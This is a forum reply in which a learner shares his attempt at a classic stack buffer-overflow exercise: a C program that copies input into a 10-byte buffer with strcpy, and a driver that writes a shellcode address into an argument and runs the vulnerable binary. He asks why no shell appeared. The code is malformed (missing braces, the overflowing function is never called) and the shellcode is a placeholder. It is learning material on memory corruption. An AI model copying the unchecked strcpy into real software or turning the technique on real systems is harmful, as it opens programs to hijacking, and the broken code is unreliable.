Re: Re: understanding buffer overflows

Subject: Re: Re: understanding buffer overflows

thx.. this was a great example. yesterday i posted a replay with a different email address so i think, it was not acceptet.

i edited your exampleas followed(maybe it was a bit different, im now at work..)


#include <stdio.h>
#include <string.h>

int foo(char *a)
char buffer[10];
strcpy((char *)buffer,a);
return 0;

int main(int argc, char * argv[])
return 0;


#include <stdio.h>

int main()
char shellcode[]="Your provided shellcode";
printf("Address of Shellcode:%p\n",&shellcode);
char buffer[20];

//to put the address of shellcode at the correct position of buffer ( i ve stack randmoization on   i thik so its not static) - in my case i thing it was "14"
//dont no the currect conversation: 
*(long *)&buffer[14]=(long *)&shellcode;

execlp("./vuln", "vuln", buffer, NULL);


ant this worked fine: after execute (./test) I get a result like this:

Address of shellcode: 0xbffff0c0 

and gdb says too that eip points to 0xbffff0c0

i think this looks good - does it?

anyway, i didnt get a new instance of the shell.

if think maybe the shellcode havnt worked.

greets michael!

Copyright © 1995-2020 All rights reserved.